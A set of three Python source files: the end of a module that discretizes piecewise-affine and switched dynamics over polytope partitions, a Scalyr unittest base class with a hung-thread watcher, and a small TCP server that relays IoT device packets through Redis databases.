if plt is None or plot_partition is None:
continue
if iter_count % plot_every != 0:
continue
tmp_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
# plot pair under reachability check
ax2.clear()
si_tmp.plot(ax=ax2, color='green')
sj_tmp.plot(ax2, color='red', hatch='o', alpha=0.5)
plot_transition_arrow(si_tmp, sj_tmp, ax2)
S0.plot(ax2, color='none', hatch='/', alpha=0.3)
fig.canvas.draw()
# plot partition
ax1.clear()
plot_partition(tmp_part, transitions.T, ax=ax1, color_seed=23)
# plot dynamics
ssys.plot(ax1, show_domain=False)
# plot hatched continuous propositions
part.plot_props(ax1)
fig.canvas.draw()
# scale view based on domain,
# not only the current polytopes si, sj
l,u = part.domain.bounding_box
ax2.set_xlim(l[0,0], u[0,0])
ax2.set_ylim(l[1,0], u[1,0])
if save_img:
fname = 'movie' +str(iter_count).zfill(3)
fname += '.' + file_extension
fig.savefig(fname, dpi=250)
plt.pause(1)
new_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
# check completeness of adjacency matrix
if debug:
tmp_part = deepcopy(new_part)
tmp_part.compute_adj()
# Generate transition system and add transitions
ofts = trs.FTS()
adj = sp.lil_matrix(transitions.T)
n = adj.shape[0]
ofts_states = range(n)
ofts.states.add_from(ofts_states)
ofts.transitions.add_adj(adj, ofts_states)
# Decorate TS with state labels
atomic_propositions = set(part.prop_regions)
ofts.atomic_propositions.add_from(atomic_propositions)
for state, region in zip(ofts_states, sol):
state_prop = region.props.copy()
ofts.states.add(state, ap=state_prop)
if not (init_part_index_list is None):
ofts.states.initial.add_from([index for index, state in enumerate(part2orig) if state in init_part_index_list])
param = {
'N':N,
'trans_length':trans_length,
'closed_loop':closed_loop,
'conservative':conservative,
'use_all_horizon':use_all_horizon,
'min_cell_volume':min_cell_volume,
'max_num_poly':max_num_poly
}
ppp2orig = [part2orig[x] for x in orig]
end_time = os.times()[0]
msg = 'Total abstraction time: ' +\
str(end_time - start_time) + '[sec]'
print(msg)
logger.info(msg)
if save_img and plt is not None:
fig, ax = plt.subplots(1, 1)
plt.plot(progress)
ax.set_xlabel('iteration')
ax.set_ylabel('progress ratio')
ax.figure.savefig('progress.pdf')
return AbstractPwa(
ppp=new_part,
ts=ofts,
ppp2ts=ofts_states,
pwa=ssys,
pwa_ppp=part,
ppp2pwa=orig,
ppp2sys=subsys_list,
orig_ppp=orig_ppp,
ppp2orig=ppp2orig,
disc_params=param
)
def reachable_within(trans_length, adj_k, adj):
"""Find cells reachable within trans_length hops.
"""
if trans_length <= 1:
return adj_k
k = 1
while k < trans_length:
adj_k = np.dot(adj_k, adj)
k += 1
adj_k = (adj_k > 0).astype(int)
return adj_k
def sym_adj_change(IJ, adj_k, transitions, i):
horizontal = adj_k[i, :] -transitions[i, :] > 0
vertical = adj_k[:, i] -transitions[:, i] > 0
IJ[i, :] = horizontal.astype(int)
IJ[:, i] = vertical.astype(int)
# DEFUNCT until further notice
def discretize_overlap(closed_loop=False, conservative=False):
"""default False.
UNDER DEVELOPMENT; function signature may change without notice.
Calling will result in NotImplementedError.
"""
raise NotImplementedError
#
# if rdiff < abs_tol:
# logger.info("Transition found")
# transitions[i,j] = 1
#
# elif (vol1 > min_cell_volume) & (risect > rd) & \
# (num_new_reg[i] <= num_orig_neigh[i]+1):
#
# # Make sure new cell is Region and add proposition lists
# if len(isect) == 0:
# isect = pc.Region([isect], si.props)
# else:
# isect.props = si.props.copy()
#
# # Add new state
# sol.append(isect)
# size = len(sol)
#
# # Add transitions
# transitions = np.hstack([transitions, np.zeros([size - 1, 1],
# dtype=int) ])
# transitions = np.vstack([transitions, np.zeros([1, size],
# dtype=int) ])
#
# # All sets reachable from orig cell are reachable from both cells
# transitions[size-1,:] = transitions[i,:]
# transitions[size-1,j] = 1 # j is reachable from new cell
#
# # Take care of adjacency
# old_adj = np.nonzero(adj[i,:])[0]
#
# adj = np.hstack([adj, np.zeros([size - 1, 1], dtype=int) ])
# adj = np.vstack([adj, np.zeros([1, size], dtype=int) ])
# adj[i,size-1] = 1
# adj[size-1,i] = 1
# adj[size-1,size-1] = 1
#
# for k in np.setdiff1d(old_adj,[i,size-1]):
# if pc.is_adjacent(sol[size-1],sol[k],overlap=True):
# adj[size-1,k] = 1
# adj[k, size-1] = 1
# else:
# # Actively remove (valid) transitions between non-neighbors
# transitions[size-1,k] = 0
# transitions[k,size-1] = 0
#
# # Assign original proposition cell to new state and update counts
# if not conservative:
# orig = np.hstack([orig, orig[i]])
# print(num_new_reg)
# num_new_reg = np.hstack([num_new_reg, 0])
# num_orig_neigh = np.hstack([num_orig_neigh, np.sum(adj[size-1,:])-1])
#
# logger.info("\n Adding state " + str(size-1) + "\n")
#
# # Just add adjacent cells for checking,
# # unless transition already found
# IJ = np.hstack([IJ, np.zeros([size - 1, 1], dtype=int) ])
# IJ = np.vstack([IJ, np.zeros([1, size], dtype=int) ])
# horiz2 = adj[size-1,:] - transitions[size-1,:] > 0
# verti2 = adj[:,size-1] - transitions[:,size-1] > 0
# IJ[size-1,:] = horiz2.astype(int)
# IJ[:,size-1] = verti2.astype(int)
# else:
# logger.info("No transition found, intersect vol: " + str(vol1) )
# transitions[i,j] = 0
#
# new_part = PropPreservingPartition(
# domain=part.domain,
# regions=sol, adj=np.array([]),
# trans=transitions, prop_regions=part.prop_regions,
# original_regions=orig_list, orig=orig)
# return new_part
def multiproc_discretize(q, mode, ppp, cont_dyn, disc_params):
global logger
logger = mp.log_to_stderr()
name = mp.current_process().name
print('Abstracting mode: ' + str(mode) + ', on: ' + str(name))
absys = discretize(ppp, cont_dyn, **disc_params)
q.put((mode, absys))
print('Worker: ' + str(name) + 'finished.')
def multiproc_get_transitions(
q, absys, mode, ssys, params
):
global logger
logger = mp.log_to_stderr()
name = mp.current_process().name
print('Merged transitions for mode: ' + str(mode) + ', on: ' + str(name))
trans = get_transitions(absys, mode, ssys, **params)
q.put((mode, trans))
print('Worker: ' + str(name) + 'finished.')
def multiproc_discretize_switched(
ppp, hybrid_sys, disc_params=None,
plot=False, show_ts=False, only_adjacent=True
):
"""Parallel implementation of discretize_switched.
Uses the multiprocessing package.
"""
logger.info('parallel discretize_switched started')
modes = list(hybrid_sys.modes)
mode_nums = hybrid_sys.disc_domain_size
q = mp.Queue()
mode_args = dict()
for mode in modes:
cont_dyn = hybrid_sys.dynamics[mode]
mode_args[mode] = (q, mode, ppp, cont_dyn, disc_params[mode])
jobs = [mp.Process(target=multiproc_discretize, args=args)
for args in mode_args.values()]
for job in jobs:
job.start()
# flush before join:
# http://stackoverflow.com/questions/19071529/
abstractions = dict()
for job in jobs:
mode, absys = q.get()
abstractions[mode] = absys
for job in jobs:
job.join()
# merge their domains
(merged_abstr, ap_labeling) = merge_partitions(abstractions)
n = len(merged_abstr.ppp)
logger.info('Merged partition has: ' + str(n) + ', states')
# find feasible transitions over merged partition
for mode in modes:
cont_dyn = hybrid_sys.dynamics[mode]
params = disc_params[mode]
mode_args[mode] = (q, merged_abstr, mode, cont_dyn, params)
jobs = [mp.Process(target=multiproc_get_transitions, args=args)
for args in mode_args.values()]
for job in jobs:
job.start()
trans = dict()
for job in jobs:
mode, t = q.get()
trans[mode] = t
# merge the abstractions, creating a common TS
merge_abstractions(merged_abstr, trans,
abstractions, modes, mode_nums)
if plot:
plot_mode_partitions(merged_abstr, show_ts, only_adjacent)
return merged_abstr
def discretize_switched(
ppp, hybrid_sys, disc_params=None,
plot=False, show_ts=False, only_adjacent=True
):
"""Abstract switched dynamics over given partition.
@type ppp: L{PropPreservingPartition}
@param hybrid_sys: dynamics of switching modes
@type hybrid_sys: L{SwitchedSysDyn}
@param disc_params: discretization parameters passed to L{discretize} for
each mode. See L{discretize} for details.
@type disc_params: dict (keyed by mode) of dicts.
@param plot: save partition images
@type plot: bool
@param show_ts, only_adjacent: options for L{AbstractPwa.plot}.
@return: abstracted dynamics,
some attributes are dict keyed by mode
@rtype: L{AbstractSwitched}
"""
if disc_params is None:
disc_params = {'N':1, 'trans_length':1}
logger.info('discretizing hybrid system')
modes = list(hybrid_sys.modes)
mode_nums = hybrid_sys.disc_domain_size
# discretize each abstraction separately
abstractions = dict()
for mode in modes:
logger.debug(30*'-'+'\n')
logger.info('Abstracting mode: ' + str(mode))
cont_dyn = hybrid_sys.dynamics[mode]
absys = discretize(
ppp, cont_dyn,
**disc_params[mode]
)
logger.debug('Mode Abstraction:\n' + str(absys) +'\n')
abstractions[mode] = absys
# merge their domains
(merged_abstr, ap_labeling) = merge_partitions(abstractions)
n = len(merged_abstr.ppp)
logger.info('Merged partition has: ' + str(n) + ', states')
# find feasible transitions over merged partition
trans = dict()
for mode in modes:
cont_dyn = hybrid_sys.dynamics[mode]
params = disc_params[mode]
trans[mode] = get_transitions(
merged_abstr, mode, cont_dyn,
N=params['N'], trans_length=params['trans_length']
)
# merge the abstractions, creating a common TS
merge_abstractions(merged_abstr, trans,
abstractions, modes, mode_nums)
if plot:
plot_mode_partitions(merged_abstr, show_ts, only_adjacent)
return merged_abstr
def plot_mode_partitions(swab, show_ts, only_adjacent):
"""Save each mode's partition and final merged partition.
"""
axs = swab.plot(show_ts, only_adjacent)
if not axs:
logger.error('failed to plot the partitions.')
return
n = len(swab.modes)
assert(len(axs) == 2*n)
# annotate
for ax in axs:
plot_annot(ax)
# save mode partitions
for ax, mode in zip(axs[:n], swab.modes):
fname = 'merged_' + str(mode) + '.pdf'
ax.figure.savefig(fname)
# save merged partition
for ax, mode in zip(axs[n:], swab.modes):
fname = 'part_' + str(mode) + '.pdf'
ax.figure.savefig(fname)
def plot_annot(ax):
fontsize = 5
for tick in ax.xaxis.get_major_ticks():
tick.label1.set_fontsize(fontsize)
for tick in ax.yaxis.get_major_ticks():
tick.label1.set_fontsize(fontsize)
ax.set_xlabel('$v_1$', fontsize=fontsize+6)
ax.set_ylabel('$v_2$', fontsize=fontsize+6)
def merge_abstractions(merged_abstr, trans, abstr, modes, mode_nums):
"""Construct merged transitions.
@type merged_abstr: L{AbstractSwitched}
@type abstr: dict of L{AbstractPwa}
"""
# TODO: check equality of atomic proposition sets
aps = abstr[modes[0]].ts.atomic_propositions
logger.info('APs: ' + str(aps))
sys_ts = trs.FTS()
# create stats
n = len(merged_abstr.ppp)
states = range(n)
sys_ts.states.add_from(states)
sys_ts.atomic_propositions.add_from(aps)
# copy AP labels from regions to discrete states
ppp2ts = states
for (i, state) in enumerate(ppp2ts):
props = merged_abstr.ppp[i].props
sys_ts.states[state]['ap'] = props
# create mode actions
sys_actions = [str(s) for e,s in modes]
env_actions = [str(e) for e,s in modes]
# no env actions ?
if mode_nums[0] == 0:
actions_per_mode = {
(e,s):{'sys_actions':str(s)}
for e,s in modes
}
sys_ts.sys_actions.add_from(sys_actions)
elif mode_nums[1] == 0:
# no sys actions
actions_per_mode = {
(e,s):{'env_actions':str(e)}
for e,s in modes
}
sys_ts.env_actions.add_from(env_actions)
else:
actions_per_mode = {
(e,s):{'env_actions':str(e), 'sys_actions':str(s)}
for e,s in modes
}
sys_ts.env_actions.add_from([str(e) for e,s in modes])
sys_ts.sys_actions.add_from([str(s) for e,s in modes])
for mode in modes:
env_sys_actions = actions_per_mode[mode]
adj = trans[mode]
sys_ts.transitions.add_adj(
adj = adj,
adj2states = states,
**env_sys_actions
)
merged_abstr.ts = sys_ts
merged_abstr.ppp2ts = ppp2ts
def get_transitions(
abstract_sys, mode, ssys, N=10,
closed_loop=True,
trans_length=1
):
"""Find which transitions are feasible in given mode.
Used for the candidate transitions of the merged partition.
@rtype: scipy.sparse.lil_matrix
"""
logger.info('checking which transitions remain feasible after merging')
part = abstract_sys.ppp
# Initialize matrix for pairs to check
IJ = part.adj.copy()
if trans_length > 1:
k = 1
while k < trans_length:
IJ = np.dot(IJ, part.adj)
k += 1
IJ = (IJ > 0).astype(int)
# Initialize output
n = len(part)
transitions = sp.lil_matrix((n, n), dtype=int)
# Do the abstraction
n_checked = 0
n_found = 0
while np.sum(IJ) > 0:
n_checked += 1
ind = np.nonzero(IJ)
i = ind[1][0]
j = ind[0][0]
IJ[j,i] = 0
logger.debug('checking transition: ' + str(i) + ' -> ' + str(j))
si = part[i]
sj = part[j]
# Use original cell as trans_set
trans_set = abstract_sys.ppp2pwa(mode, i)[1]
active_subsystem = abstract_sys.ppp2sys(mode, i)[1]
trans_feasible = is_feasible(
si, sj, active_subsystem, N,
closed_loop = closed_loop,
trans_set = trans_set
)
if trans_feasible:
transitions[i, j] = 1
msg = '\t Feasible transition.'
n_found += 1
else:
transitions[i, j] = 0
msg = '\t Not feasible transition.'
logger.debug(msg)
logger.info('Checked: ' + str(n_checked))
logger.info('Found: ' + str(n_found))
assert n_checked != 0, 'would divide '
logger.info('Survived merging: ' + str(float(n_found) / n_checked) + ' % ')
return transitions
def multiproc_merge_partitions(abstractions):
"""LOGTIME in #processors parallel merging.
Assuming sufficient number of processors.
UNDER DEVELOPMENT; function signature may change without notice.
Calling will result in NotImplementedError.
"""
raise NotImplementedError
def merge_partitions(abstractions):
"""Merge multiple abstractions.
@param abstractions: keyed by mode
@type abstractions: dict of L{AbstractPwa}
@return: (merged_abstraction, ap_labeling)
where:
- merged_abstraction: L{AbstractSwitched}
- ap_labeling: dict
"""
if len(abstractions) == 0:
warnings.warn('Abstractions empty, nothing to merge.')
return
# consistency check
for ab1 in abstractions.values():
for ab2 in abstractions.values():
p1 = ab1.ppp
p2 = ab2.ppp
if p1.prop_regions != p2.prop_regions:
msg = 'merge: partitions have different sets '
msg += 'of continuous propositions'
raise Exception(msg)
if not (p1.domain.A == p2.domain.A).all() or \
not (p1.domain.b == p2.domain.b).all():
raise Exception('merge: partitions have different domains')
# check equality of original PPP partitions
if ab1.orig_ppp == ab2.orig_ppp:
logger.info('original partitions happen to be equal')
init_mode = list(abstractions.keys())[0]
all_modes = set(abstractions)
remaining_modes = all_modes.difference(set([init_mode]))
print('init mode: ' + str(init_mode))
print('all modes: ' + str(all_modes))
print('remaining modes: ' + str(remaining_modes))
# initialize iteration data
prev_modes = [init_mode]
# Create a list of merged-together regions
ab0 = abstractions[init_mode]
regions = list(ab0.ppp)
parents = {init_mode:list(range(len(regions) ))}
ap_labeling = {i:reg.props for i,reg in enumerate(regions)}
for cur_mode in remaining_modes:
ab2 = abstractions[cur_mode]
r = merge_partition_pair(
regions, ab2, cur_mode, prev_modes,
parents, ap_labeling
)
regions, parents, ap_labeling = r
prev_modes += [cur_mode]
new_list = regions
# build adjacency based on spatial adjacencies of
# component abstractions.
# which justifies the assumed symmetry of part1.adj, part2.adj
# Basically, if two regions are either 1) part of the same region in one of
# the abstractions or 2) adjacent in one of the abstractions, then the two
# regions are adjacent in the switched dynamics.
n_reg = len(new_list)
adj = np.zeros([n_reg, n_reg], dtype=int)
for i, reg_i in enumerate(new_list):
for j, reg_j in enumerate(new_list[0:i]):
touching = False
for mode in abstractions:
pi = parents[mode][i]
pj = parents[mode][j]
part = abstractions[mode].ppp
if (part.adj[pi, pj] == 1) or (pi == pj):
touching = True
break
if not touching:
continue
if pc.is_adjacent(reg_i, reg_j):
adj[i,j] = 1
adj[j,i] = 1
adj[i,i] = 1
ppp = PropPreservingPartition(
domain=ab0.ppp.domain,
regions=new_list,
prop_regions=ab0.ppp.prop_regions,
adj=adj
)
abstraction = AbstractSwitched(
ppp=ppp,
modes=abstractions,
ppp2modes=parents,
)
return (abstraction, ap_labeling)
def merge_partition_pair(
old_regions, ab2,
cur_mode, prev_modes,
old_parents, old_ap_labeling
):
"""Merge an Abstraction with the current partition iterate.
@param old_regions: A list of C{Region} that is from either:
1. The ppp of the first (initial) L{AbstractPwa} to be merged.
2. A list of already-merged regions
@type old_regions: list of C{Region}
@param ab2: Abstracted piecewise affine dynamics to be merged into the
@type ab2: L{AbstractPwa}
@param cur_mode: mode to be merged
@type cur_mode: tuple
@param prev_modes: list of modes that have already been merged together
@type prev_modes: list of tuple
@param old_parents: dict of modes that have already been merged to dict of
indices of new regions to indices of regions
@type old_parents: dict of modes to list of region indices in list
C{old_regions} or dict of region indices to regions in original ppp for
that mode
@param old_ap_labeling: dict of states of already-merged modes to sets of
propositions for each state
@type old_ap_labeling: dict of tuples to sets
@return: the following:
- C{new_list}, list of new regions
- C{parents}, same as input param C{old_parents}, except that it
includes the mode that was just merged and for list of regions in
return value C{new_list}
- C{ap_labeling}, same as input param C{old_ap_labeling}, except that it
includes the mode that was just merged.
"""
logger.info('merging partitions')
part2 = ab2.ppp
modes = prev_modes + [cur_mode]
new_list = []
parents = {mode:dict() for mode in modes}
ap_labeling = dict()
for i in range(len(old_regions)):
for j in range(len(part2)):
isect = pc.intersect(old_regions[i],
part2[j])
rc, xc = pc.cheby_ball(isect)
# no intersection ?
if rc < 1e-5:
continue
logger.info('merging region: A' + str(i) +
', with: B' + str(j))
# if Polytope, make it Region
if len(isect) == 0:
isect = pc.Region([isect])
# label the Region with propositions
isect.props = old_regions[i].props.copy()
new_list.append(isect)
idx = new_list.index(isect)
# keep track of parents
for mode in prev_modes:
parents[mode][idx] = old_parents[mode][i]
parents[cur_mode][idx] = j
# union of AP labels from parent states
ap_label_1 = old_ap_labeling[i]
ap_label_2 = ab2.ts.states[j]['ap']
logger.debug('AP label 1: ' + str(ap_label_1))
logger.debug('AP label 2: ' + str(ap_label_2))
# original partitions may be different if pwa_partition used
# but must originate from same initial partition,
# i.e., have same continuous propositions, checked above
#
# so no two intersecting regions can have different AP labels,
# checked here
if ap_label_1 != ap_label_2:
msg = 'Inconsistent AP labels between intersecting regions\n'
msg += 'of partitions of switched system.'
raise Exception(msg)
ap_labeling[idx] = ap_label_1
return new_list, parents, ap_labeling
|
test_base.py
|
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
#
# author: Steven Czerwinski <czerwin@scalyr.com>
__author__ = 'czerwin@scalyr.com'
import sys
import threading
import time
import unittest
import scalyr_agent.scalyr_logging as scalyr_logging
from scalyr_agent.util import StoppableThread
PYTHON_26_OR_OLDER = sys.version_info[:2] < (2, 7)
def _noop_skip(reason):
def decorator(test_func_or_obj):
if not isinstance(test_func_or_obj, type):
def skip_wrapper(*args, **kwargs):
print('Skipping test %s. Reason: "%s"' % (test_func_or_obj.__name__, reason))
return skip_wrapper
else:
test_func_or_obj.__unittest_skip__ = True
test_func_or_obj.__unittest_skip_why__ = reason
return test_func_or_obj
return decorator
def _id(obj):
return obj
def _noop_skip_if(condition, reason):
if condition:
return _noop_skip(reason)
return _id
def _noop_skip_unless(condition, reason):
if not condition:
return _noop_skip(reason)
return _id
skip = _noop_skip
if hasattr(unittest, 'skip'):
skip = unittest.skip
skipUnless = _noop_skip_unless
if hasattr(unittest, 'skipUnless'):
skipUnless = unittest.skipUnless
skipIf = _noop_skip_if
if hasattr(unittest, 'skipIf'):
skipIf = unittest.skipIf
# Global state as to whether or not we've started the thread watcher. We only want one instance of this
# started per entire test suite run.
__thread_watcher_started = False
def _thread_watcher():
"""Used to detect what threads are still alive after the tests should be finished running. In particular, this
helps detect cases where the tests have run successfully but some thread spawned by a test case did not
properly stop. Since it is not a daemon thread, it will block the exit of the entire process.
"""
# Sleep for 60 seconds since our test suites typically run in less than 15 seconds.
time.sleep(60)
# If we are still alive after 60 seconds, it means some test is hung or didn't join
# its threads properly. Let's get some information on them.
print 'Detected hung test run. Active threads are:'
for t in threading.enumerate():
print 'Active thread %s daemon=%s' % (t.getName(), str(t.isDaemon()))
print 'Done'
def _start_thread_watcher_if_necessary():
"""Starts the thread watcher if it hasn't already been started.
"""
global __thread_watcher_started
if not __thread_watcher_started:
thread = threading.Thread(name='hung thread watcher', target=_thread_watcher)
thread.setDaemon(True)
thread.start()
__thread_watcher_started = True
class BaseScalyrTestCase(unittest.TestCase):
"""Used to define ScalyrTestCase below.
This augments the standard TestCase by capturing all logged lines to stdout and
adds protection to help detect hung test threads.
"""
# noinspection PyPep8Naming
def __init__(self, methodName='runTest', verify_setup_invoked=False):
unittest.TestCase.__init__(self, methodName=methodName)
# Add in some code to check to make sure that derived classed invoked this classes `setUp` method if
# they overrode it.
if verify_setup_invoked:
self.__setup_invoked = False
self.addCleanup(self.verify_setup_invoked)
def setUp(self):
# We need to reset the log destinations here because it is only at this point is stdout replaced with
# whatever object is capturing stdout for this test case.
scalyr_logging.set_log_destination(use_stdout=True)
self.__setup_invoked = True
def run(self, result=None):
_start_thread_watcher_if_necessary()
StoppableThread.set_name_prefix('TestCase %s: ' % str(self))
return unittest.TestCase.run(self, result=result)
def verify_setup_invoked(self):
self.assertTrue(self.__setup_invoked,
msg='Inherited setUp method was not invoked by class derived from ScalyrTestCase')
if sys.version_info[:2] < (2, 7):
class ScalyrTestCase(BaseScalyrTestCase):
"""The base class for Scalyr tests.
This is used mainly to hide differences between the test fixtures available in the various Python
versions.
WARNING: Derived classes that override setUp, must be sure to invoke the inherited setUp method.
"""
# noinspection PyPep8Naming
def __init__(self, methodName='runTest'):
# Do not verify the setup was invoked since it relies on addCleanup which is only available in 2.7
BaseScalyrTestCase.__init__(self, methodName=methodName, verify_setup_invoked=False)
def assertIs(self, obj1, obj2, msg=None):
"""Just like self.assertTrue(a is b), but with a nicer default message."""
if obj1 is not obj2:
if msg is None:
msg = '%s is not %s' % (obj1, obj2)
self.fail(msg)
def assertIsNone(self, obj, msg=None):
"""Same as self.assertTrue(obj is None), with a nicer default message."""
if msg is not None:
self.assertTrue(obj is None, msg)
else:
self.assertTrue(obj is None, '%s is not None' % (str(obj)))
def assertIsNotNone(self, obj, msg=None):
"""Included for symmetry with assertIsNone."""
if msg is not None:
self.assertTrue(obj is not None, msg)
else:
self.assertTrue(obj is not None, '%s is None' % (str(obj)))
def assertGreater(self, a, b, msg=None):
if msg is not None:
self.assertTrue(a > b, msg)
else:
self.assertTrue(a > b, '%s is greater than %s' % (str(a), str(b)))
def assertLess(self, a, b, msg=None):
if msg is not None:
self.assertTrue(a < b, msg)
else:
self.assertTrue(a < b, '%s is greater than %s' % (str(a), str(b)))
else:
class ScalyrTestCase(BaseScalyrTestCase):
"""The base class for Scalyr tests.
This is used mainly to hide differences between the test fixtures available in the various Python
versions.
WARNING: Derived classes that override setUp, must be sure to invoke the inherited setUp method.
"""
# noinspection PyPep8Naming
def __init__(self, methodName='runTest'):
BaseScalyrTestCase.__init__(self, methodName=methodName, verify_setup_invoked=True)
def assertIs(self, obj1, obj2, msg=None):
unittest.TestCase.assertIs(self, obj1, obj2, msg=msg)
def assertIsNone(self, obj, msg=None):
unittest.TestCase.assertIsNone(self, obj, msg=msg)
def assertIsNotNone(self, obj, msg=None):
unittest.TestCase.assertIsNotNone(self, obj, msg=msg)
def assertGreater(self, a, b, msg=None):
unittest.TestCase.assertGreater(self, a, b, msg=msg)
def assertLess(self, a, b, msg=None):
unittest.TestCase.assertLess(self, a, b, msg=msg)
|
TCP_Server.py
|
import os
import sys
import logging
import socket as sock
import threading as thrd
import socketserver
import json
import ujson
import datetime as dt
import json
from enum import Enum
#import yaml
import dill
import Redis_DB_Controller as rsdb
from DB.RedisDB_Test_Client import DbNumberSelector
class ForkedTCPServer(socketserver.ForkingMixIn, socketserver.TCPServer):
pass
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
class TcpRequestsHandlingMode(Enum):
SINGLETHREADING = 1
MULTITHREADING = 2
class IoTControl:
def __init__(self, name, ctrl_id, type):
self.set(name, ctrl_id, type)
def set(self, name, ctrl_id, type):
self._name = name
self._ctrl_id = ctrl_id
self._type = type
def get(self):
return (self._name, self._ctrl_id, self._type)
class IoTDevice:
def addAllControlsToList(self, controlsListInPack):
for control in controlsListInPack:
self._listOfControls.append(control)
def createFirstChangesPacket(self, helloPack):
self._changesPacket = helloPack["changes_packet"]
def __init__(self, helloPack):
self._devID = helloPack["dev_id"]
self._label = helloPack["label"]
self._listOfControls = list()
self._controlsCount = len(helloPack["controls"])
self.addAllControlsToList(helloPack["controls"])
self._timestamp = dt.datetime.now(tz=None)
self._changesPacket = dict()
self.createFirstChangesPacket(helloPack)
self._devHelloPack = helloPack
def getChangesPackSection(self):
return self._changesPacket
def setChangesPackSection(self, newChangesPack):
self._changesPacket = newChangesPack
def printDeviceInfo(self):
print("Dev_ID: ", self._devID)
print("Label: ", self._label)
print("Controls: ", self._listOfControls)
print("Timestamp: ", self._timestamp)
print("ChangesPackSection: ", self._changesPacket)
class DevicesInfo:
def addIotDevicesToList(self, devices):
for device in devices:
self._devices.append(device)
def __init__(self, devices=list()):
self._devices = list()
def getDevicesList(self):
return self._devices
def setDevicesList(self, devices):
self._devices = devices
def printDevicesData(self):
for device in self._devices:
print(device)
class TcpTransferStatisticsCollector:
pass
class Packet:
def __init__(self, packet):
self._packet = packet
self._packType = packet["type"]
self._timestamp = packet["time_stamp"]
def setPacketData(self, packData, packType, packTimestamp):
self._packet = packData
self._packType = packType
self._timestamp = packTimestamp
def getPacketData(self):
return (self._packType, self._timestamp, self._packet)
def getMainPackData(self):
return (self._packType, self._timestamp)
def getPacket(self):
return self._packet
def setPacket(self, packet):
self._packet = packet
class RequestsHandler(socketserver.BaseRequestHandler):
def __init__(self, request, client_address, server):
#
self.broken_packets_counter = 0
#
self.normal_packets_counter = 0
#
self.transfer_counter = 0
#
self.broken_packets_transfer_stat = 0.0
# db 0 : devices
self._redis = rsdb.RedisDB_Wrapper(0)
# db 1 : packets_from_tcp
self._redis1 = rsdb.RedisDB_Wrapper(1)
# db 2 : packets from ws
self._redis2 = rsdb.RedisDB_Wrapper(2)
# db 3 : all packets
self._redis3 = rsdb.RedisDB_Wrapper(3)
# unique key for rs1
self._rs1_index = 0
# unique key for rs3
self._rs3_index = 0
self.logger = logging.getLogger('RequestHandler')
self.logger.debug('__init__')
socketserver.BaseRequestHandler.__init__(self, request,
client_address,
server)
return
def setup(self):
self.logger.debug('setup')
return socketserver.BaseRequestHandler.setup(self)
def test_packets_recv_from_ESP8266(self, stopSymbol="\r"):
raw_data = self.request.recv(4096)
normPack = raw_data.decode("utf-8")
print(normPack)
# data = ujson.loads(raw_data.decode("ascii"))
# print(data)
# ack = "ok".encode()
# self.request.send(ack)
'''
pack = {"controls": [{"state": "on", "ctrl_id": "adolorumdeleniti"},
{"state": 54, "ctrl_id": "voluptatibuslaboreamet"},
{"state": 75, "ctrl_id": "errorreruma"}, {"state": 4034, "ctrl_id": "quosquoddistinctio"},
{"state": "on", "ctrl_id": "necessitatibusdolorlaboriosam"}], "type": "dev_changes",
"dev_id": "209.154.213.252", "time_stamp": 1270305449}
'''
pack = {"status": "ok"}
raw_data = (ujson.dumps(pack, ensure_ascii=False) + stopSymbol).encode("utf-8")
# raw_data = pack.encode("utf-8")
# raw_data = ujson.dumps(pack).encode("ascii")
self.request.send(raw_data)
def updateDataInRSDB(self, packet):
if packet["type"] == "dev_hello":
key = packet["dev_id"]
print("Cur Key = ", key)
iot_dev = IoTDevice(packet)
self._redis.addObjectToDB(key, iot_dev)
iotDev = self._redis.getObject(key)
print(iotDev.printDeviceInfo())
if packet["type"] == "dev_changes":
key = packet["dev_id"]
iotDev = self._redis.getObject(key)
if iotDev is not None:
iotDev.setChangesPackSection(packet)
self._redis.addObjectToDB(key, iotDev)
print(iotDev.printDeviceInfo())
def addPacketToDB1(self, packet, isComplexObject=True):
if isComplexObject:
pack = Packet(packet)
#dill.detect.errors(pack)
self._redis1.addObjectToDB(str(self._rs1_index), pack)
else:
self._redis1.addRecordToDB(str(self._rs1_index), packet)
self._rs1_index += 1
def addPacketToDB3(self, packet, isComplexObject=True):
if isComplexObject:
pack = Packet(packet)
dill.detect.errors(pack)
self._redis3.addObjectToDB(str(self._rs3_index), pack)
else:
self._redis3.addRecordToDB(str(self._rs3_index), packet)
self._rs3_index += 1
'''
db0 : devices
db1 : current packets from tcp-socket
db2 : current packets from ws
db3 : all packets
'''
def dbMonitoring(self, dbNumber):
if dbNumber == DbNumberSelector.REDIS_DB_0:
return self._redis.isRedisServerAvailable()
if dbNumber == DbNumberSelector.REDIS_DB_1:
return self._redis1.isRedisServerAvailable()
if dbNumber == DbNumberSelector.REDIS_DB_2:
return self._redis2.isRedisServerAvailable()
if dbNumber == DbNumberSelector.REDIS_DB_3:
return self._redis3.isRedisServerAvailable()
def readAllPacketsFromDB2(self, isComplexObject=True):
keys = self._redis2.getAllKeys()
packets = list()
#if keys is not None:
if len(keys) > 0:
for key in keys:
if isComplexObject:
packet = self._redis2.getObject(key)
else:
packet = self._redis2.getRecord(key)
packets.append(packet)
return packets
else:
#return None
print("Keys list of RSDB #2 is empty!")
return packets
def isPacketsExists(self, packets):
#if packets is not None:
if len(packets) > 0:
return True
else:
return False
def sendPacketsFromWS(self, packets):
for pack in packets:
#raw_data = (ujson.dumps(pack, ensure_ascii=False) + "\r").encode("utf-8")
raw_data = (ujson.dumps(pack, ensure_ascii=False)).encode("utf-8")
self.request.send(raw_data)
def clearDB2(self):
self._redis2.delDataFromCurDB()
def printPacket(self, packet):
print("Pack Type: ", packet["type"])
print("Pack:")
print(packet)
def printPacketInNormalView(self, parsedPacket):
print(json.dumps(parsedPacket, indent=4, sort_keys=True))
def jsonPackSerialize(self, packet):
# return ujson.dumps(pack, ensure_ascii=False).encode("utf-8")
return json.dumps(packet, ensure_ascii=False).encode("utf-8")
